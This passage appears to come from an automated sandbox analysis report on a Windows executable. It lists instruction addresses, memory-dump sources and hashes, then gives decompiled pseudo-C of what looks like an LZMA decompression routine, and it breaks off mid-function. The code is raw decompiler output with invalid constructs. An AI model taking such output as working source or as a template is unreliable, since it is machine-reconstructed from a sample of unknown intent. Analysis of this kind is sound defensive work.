                                                                                                                              0x004065df
                                                                                                                              0x004065e2
                                                                                                                              0x004065e5
                                                                                                                              0x004065e9
                                                                                                                              0x004065ec
                                                                                                                              0x004065f2
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f4
                                                                                                                              0x004065f7
                                                                                                                              0x004065fa
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061ca
                                                                                                                              0x004061ca
                                                                                                                              0x004061ce
                                                                                                                              0x0040693b
                                                                                                                              0x00000000
                                                                                                                              0x0040693b
                                                                                                                              0x004061d4
                                                                                                                              0x004061d7
                                                                                                                              0x004061da
                                                                                                                              0x004061de
                                                                                                                              0x004061e1
                                                                                                                              0x004061e7
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061e9
                                                                                                                              0x004061ec
                                                                                                                              0x004061ef
                                                                                                                              0x004061ef
                                                                                                                              0x004061f2
                                                                                                                              0x004061f5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004061fb
                                                                                                                              0x00406201
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406207
                                                                                                                              0x00406207
                                                                                                                              0x0040620b
                                                                                                                              0x0040620e
                                                                                                                              0x00406211
                                                                                                                              0x00406214
                                                                                                                              0x00406217
                                                                                                                              0x00406218
                                                                                                                              0x0040621b
                                                                                                                              0x0040621d
                                                                                                                              0x00406223
                                                                                                                              0x00406226
                                                                                                                              0x00406229
                                                                                                                              0x0040622c
                                                                                                                              0x0040622f
                                                                                                                              0x00406232
                                                                                                                              0x00406235
                                                                                                                              0x00406251
                                                                                                                              0x00406254
                                                                                                                              0x00406257
                                                                                                                              0x0040625a
                                                                                                                              0x00406261
                                                                                                                              0x00406265
                                                                                                                              0x00406267
                                                                                                                              0x0040626b
                                                                                                                              0x00406237
                                                                                                                              0x00406237
                                                                                                                              0x0040623b
                                                                                                                              0x00406243
                                                                                                                              0x00406248
                                                                                                                              0x0040624a
                                                                                                                              0x0040624c
                                                                                                                              0x0040624c
                                                                                                                              0x0040626e
                                                                                                                              0x00406275
                                                                                                                              0x00406278
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x0040627e
                                                                                                                              0x00000000
                                                                                                                              0x00406283
                                                                                                                              0x00406283
                                                                                                                              0x00406287
                                                                                                                              0x00406947
                                                                                                                              0x00000000
                                                                                                                              0x00406947
                                                                                                                              0x0040628d
                                                                                                                              0x00406290
                                                                                                                              0x00406293
                                                                                                                              0x00406297
                                                                                                                              0x0040629a
                                                                                                                              0x004062a0
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a2
                                                                                                                              0x004062a5
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062a8
                                                                                                                              0x004062ae
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004062b0
                                                                                                                              0x004062b3
                                                                                                                              0x004062b6
                                                                                                                              0x004062b9
                                                                                                                              0x004062bc
                                                                                                                              0x004062bf
                                                                                                                              0x004062c2
                                                                                                                              0x004062c5
                                                                                                                              0x004062c8
                                                                                                                              0x004062cb
                                                                                                                              0x004062ce
                                                                                                                              0x004062e6
                                                                                                                              0x004062e9
                                                                                                                              0x004062ec
                                                                                                                              0x004062ef
                                                                                                                              0x004062ef
                                                                                                                              0x004062f2
                                                                                                                              0x004062f6
                                                                                                                              0x004062f8
                                                                                                                              0x004062d0
                                                                                                                              0x004062d0
                                                                                                                              0x004062d8
                                                                                                                              0x004062dd
                                                                                                                              0x004062df
                                                                                                                              0x004062e1
                                                                                                                              0x004062e1
                                                                                                                              0x004062fb
                                                                                                                              0x00406302
                                                                                                                              0x00406305
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00000000
                                                                                                                              0x00406307
                                                                                                                              0x00406305
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x0040630c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406347
                                                                                                                              0x00406347
                                                                                                                              0x0040634b
                                                                                                                              0x00406953
                                                                                                                              0x00000000
                                                                                                                              0x00406953
                                                                                                                              0x00406351
                                                                                                                              0x00406354
                                                                                                                              0x00406357
                                                                                                                              0x0040635b
                                                                                                                              0x0040635e
                                                                                                                              0x00406364
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406366
                                                                                                                              0x00406369
                                                                                                                              0x0040636c
                                                                                                                              0x0040636c
                                                                                                                              0x00406372
                                                                                                                              0x00406310
                                                                                                                              0x00406310
                                                                                                                              0x00406313
                                                                                                                              0x00000000
                                                                                                                              0x00406313
                                                                                                                              0x00406374
                                                                                                                              0x00406374
                                                                                                                              0x00406377
                                                                                                                              0x0040637a
                                                                                                                              0x0040637d
                                                                                                                              0x00406380
                                                                                                                              0x00406383
                                                                                                                              0x00406386
                                                                                                                              0x00406389
                                                                                                                              0x0040638c
                                                                                                                              0x0040638f
                                                                                                                              0x00406392
                                                                                                                              0x004063aa
                                                                                                                              0x004063ad
                                                                                                                              0x004063b0
                                                                                                                              0x004063b3
                                                                                                                              0x004063b3
                                                                                                                              0x004063b6
                                                                                                                              0x004063ba
                                                                                                                              0x004063bc
                                                                                                                              0x00406394
                                                                                                                              0x00406394
                                                                                                                              0x0040639c
                                                                                                                              0x004063a1
                                                                                                                              0x004063a3
                                                                                                                              0x004063a5
                                                                                                                              0x004063a5
                                                                                                                              0x004063bf
                                                                                                                              0x004063c6
                                                                                                                              0x004063c9
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x004063cb
                                                                                                                              0x00000000
                                                                                                                              0x00406658
                                                                                                                              0x00406658
                                                                                                                              0x0040665c
                                                                                                                              0x00406983
                                                                                                                              0x00000000
                                                                                                                              0x00406983
                                                                                                                              0x00406662
                                                                                                                              0x00406665
                                                                                                                              0x00406668
                                                                                                                              0x0040666c
                                                                                                                              0x0040666f
                                                                                                                              0x00406675
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x00406677
                                                                                                                              0x0040667a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406767
                                                                                                                              0x0040676b
                                                                                                                              0x0040678d
                                                                                                                              0x00406790
                                                                                                                              0x0040679a
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x0040679d
                                                                                                                              0x0040679d
                                                                                                                              0x0040676d
                                                                                                                              0x00406770
                                                                                                                              0x00406774
                                                                                                                              0x00406777
                                                                                                                              0x00406777
                                                                                                                              0x0040677a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406824
                                                                                                                              0x00406828
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x00406846
                                                                                                                              0x0040684d
                                                                                                                              0x00406854
                                                                                                                              0x0040685b
                                                                                                                              0x0040685b
                                                                                                                              0x00000000
                                                                                                                              0x0040685b
                                                                                                                              0x0040682a
                                                                                                                              0x0040682d
                                                                                                                              0x00406830
                                                                                                                              0x00406833
                                                                                                                              0x0040683a
                                                                                                                              0x0040677e
                                                                                                                              0x0040677e
                                                                                                                              0x00406781
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406915
                                                                                                                              0x00406918
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040654f
                                                                                                                              0x00406551
                                                                                                                              0x00406558
                                                                                                                              0x00406559
                                                                                                                              0x0040655b
                                                                                                                              0x0040655e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406566
                                                                                                                              0x00406569
                                                                                                                              0x0040656c
                                                                                                                              0x0040656e
                                                                                                                              0x00406570
                                                                                                                              0x00406570
                                                                                                                              0x00406571
                                                                                                                              0x00406574
                                                                                                                              0x0040657b
                                                                                                                              0x0040657e
                                                                                                                              0x0040658c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406862
                                                                                                                              0x00406862
                                                                                                                              0x00406865
                                                                                                                              0x0040686c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406871
                                                                                                                              0x00406871
                                                                                                                              0x00406875
                                                                                                                              0x004069ad
                                                                                                                              0x00000000
                                                                                                                              0x004069ad
                                                                                                                              0x0040687b
                                                                                                                              0x0040687e
                                                                                                                              0x00406881
                                                                                                                              0x00406885
                                                                                                                              0x00406888
                                                                                                                              0x0040688e
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406890
                                                                                                                              0x00406893
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406896
                                                                                                                              0x00406899
                                                                                                                              0x00406899
                                                                                                                              0x0040689d
                                                                                                                              0x004068fd
                                                                                                                              0x00406900
                                                                                                                              0x00406905
                                                                                                                              0x00406906
                                                                                                                              0x00406908
                                                                                                                              0x0040690a
                                                                                                                              0x0040690d
                                                                                                                              0x00406819
                                                                                                                              0x00406819
                                                                                                                              0x00000000
                                                                                                                              0x0040681f
                                                                                                                              0x00406819
                                                                                                                              0x0040689f
                                                                                                                              0x004068a5
                                                                                                                              0x004068a8
                                                                                                                              0x004068ab
                                                                                                                              0x004068ae
                                                                                                                              0x004068b1
                                                                                                                              0x004068b4
                                                                                                                              0x004068b7
                                                                                                                              0x004068ba
                                                                                                                              0x004068bd
                                                                                                                              0x004068c0
                                                                                                                              0x004068d9
                                                                                                                              0x004068dc
                                                                                                                              0x004068df
                                                                                                                              0x004068e2
                                                                                                                              0x004068e6
                                                                                                                              0x004068e8
                                                                                                                              0x004068e8
                                                                                                                              0x004068e9
                                                                                                                              0x004068ec
                                                                                                                              0x004068c2
                                                                                                                              0x004068c2
                                                                                                                              0x004068ca
                                                                                                                              0x004068cf
                                                                                                                              0x004068d1
                                                                                                                              0x004068d4
                                                                                                                              0x004068d4
                                                                                                                              0x004068ef
                                                                                                                              0x004068f6
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x004068f8
                                                                                                                              0x00000000
                                                                                                                              0x00406594
                                                                                                                              0x00406597
                                                                                                                              0x004065cd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x004066fd
                                                                                                                              0x00406700
                                                                                                                              0x00406700
                                                                                                                              0x00406703
                                                                                                                              0x00406705
                                                                                                                              0x0040698f
                                                                                                                              0x00000000
                                                                                                                              0x0040698f
                                                                                                                              0x0040670b
                                                                                                                              0x0040670e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406714
                                                                                                                              0x00406718
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x0040671b
                                                                                                                              0x00000000
                                                                                                                              0x0040671b
                                                                                                                              0x00406599
                                                                                                                              0x0040659b
                                                                                                                              0x0040659d
                                                                                                                              0x0040659f
                                                                                                                              0x004065a2
                                                                                                                              0x004065a3
                                                                                                                              0x004065a5
                                                                                                                              0x004065a7
                                                                                                                              0x004065aa
                                                                                                                              0x004065ad
                                                                                                                              0x004065c3
                                                                                                                              0x004065c8
                                                                                                                              0x00406600
                                                                                                                              0x00406600
                                                                                                                              0x00406604
                                                                                                                              0x00406630
                                                                                                                              0x00406632
                                                                                                                              0x00406639
                                                                                                                              0x0040663c
                                                                                                                              0x0040663f
                                                                                                                              0x0040663f
                                                                                                                              0x00406644
                                                                                                                              0x00406644
                                                                                                                              0x00406646
                                                                                                                              0x00406649
                                                                                                                              0x00406650
                                                                                                                              0x00406653
                                                                                                                              0x00406680
                                                                                                                              0x00406680
                                                                                                                              0x00406683
                                                                                                                              0x00406686
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x004066fa
                                                                                                                              0x00000000
                                                                                                                              0x004066fa
                                                                                                                              0x00406688
                                                                                                                              0x0040668e
                                                                                                                              0x00406691
                                                                                                                              0x00406694
                                                                                                                              0x00406697
                                                                                                                              0x0040669a
                                                                                                                              0x0040669d
                                                                                                                              0x004066a0
                                                                                                                              0x004066a3
                                                                                                                              0x004066a6
                                                                                                                              0x004066a9
                                                                                                                              0x004066c2
                                                                                                                              0x004066c4
                                                                                                                              0x004066c7
                                                                                                                              0x004066c8
                                                                                                                              0x004066cb
                                                                                                                              0x004066cd
                                                                                                                              0x004066d0
                                                                                                                              0x004066d2
                                                                                                                              0x004066d4
                                                                                                                              0x004066d7
                                                                                                                              0x004066d9
                                                                                                                              0x004066dc
                                                                                                                              0x004066e0
                                                                                                                              0x004066e2
                                                                                                                              0x004066e2
                                                                                                                              0x004066e3
                                                                                                                              0x004066e6
                                                                                                                              0x004066e9
                                                                                                                              0x004066ab
                                                                                                                              0x004066ab
                                                                                                                              0x004066b3
                                                                                                                              0x004066b8
                                                                                                                              0x004066ba
                                                                                                                              0x004066bd
                                                                                                                              0x004066bd
                                                                                                                              0x004066ec
                                                                                                                              0x004066f3
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x0040667d
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x00000000
                                                                                                                              0x004066f5
                                                                                                                              0x004066f3
                                                                                                                              0x00406606
                                                                                                                              0x00406609
                                                                                                                              0x0040660b
                                                                                                                              0x0040660e
                                                                                                                              0x00406611
                                                                                                                              0x00406614
                                                                                                                              0x00406616
                                                                                                                              0x00406619
                                                                                                                              0x0040661c
                                                                                                                              0x0040661c
                                                                                                                              0x0040661f
                                                                                                                              0x0040661f
                                                                                                                              0x00406622
                                                                                                                              0x00406629
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x004065fd
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00000000
                                                                                                                              0x0040662b
                                                                                                                              0x00406629
                                                                                                                              0x004065af
                                                                                                                              0x004065b2
                                                                                                                              0x004065b4
                                                                                                                              0x004065b7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x00406316
                                                                                                                              0x0040631a
                                                                                                                              0x0040695f
                                                                                                                              0x00000000
                                                                                                                              0x0040695f
                                                                                                                              0x00406320
                                                                                                                              0x00406323
                                                                                                                              0x00406326
                                                                                                                              0x00406329
                                                                                                                              0x0040632c
                                                                                                                              0x0040632f
                                                                                                                              0x00406332
                                                                                                                              0x00406334
                                                                                                                              0x00406337
                                                                                                                              0x0040633a
                                                                                                                              0x0040633d
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004064a1
                                                                                                                              0x004064a1
                                                                                                                              0x004064a5
                                                                                                                              0x0040696b
                                                                                                                              0x00000000
                                                                                                                              0x0040696b
                                                                                                                              0x004064ab
                                                                                                                              0x004064ae
                                                                                                                              0x004064b1
                                                                                                                              0x004064b4
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b6
                                                                                                                              0x004064b9
                                                                                                                              0x004064bc
                                                                                                                              0x004064bf
                                                                                                                              0x004064c2
                                                                                                                              0x004064c5
                                                                                                                              0x004064c8
                                                                                                                              0x004064c9
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064cb
                                                                                                                              0x004064ce
                                                                                                                              0x004064d1
                                                                                                                              0x004064d4
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064d7
                                                                                                                              0x004064da
                                                                                                                              0x004064dc
                                                                                                                              0x004064dc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x0040671e
                                                                                                                              0x00406722
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406728
                                                                                                                              0x0040672b
                                                                                                                              0x0040672e
                                                                                                                              0x00406731
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406733
                                                                                                                              0x00406736
                                                                                                                              0x00406739
                                                                                                                              0x0040673c
                                                                                                                              0x0040673f
                                                                                                                              0x00406742
                                                                                                                              0x00406745
                                                                                                                              0x00406746
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x00406748
                                                                                                                              0x0040674b
                                                                                                                              0x0040674e
                                                                                                                              0x00406751
                                                                                                                              0x00406754
                                                                                                                              0x00406757
                                                                                                                              0x0040675b
                                                                                                                              0x0040675d
                                                                                                                              0x00406760
                                                                                                                              0x00000000
                                                                                                                              0x00406762
                                                                                                                              0x004064df
                                                                                                                              0x004064df
                                                                                                                              0x00000000
                                                                                                                              0x004064df
                                                                                                                              0x00406760
                                                                                                                              0x00406995
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405fc4
                                                                                                                              0x004069cc
                                                                                                                              0x004069cc
                                                                                                                              0x00000000
                                                                                                                              0x004069cc
                                                                                                                              0x00406819
                                                                                                                              0x004067a0
                                                                                                                              0x0040679d
                                                                                                                              0x00000000
                                                                                                                              0x004064f2

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                              • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                                                              • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                                                              • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 98%
                                                                                                                              			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
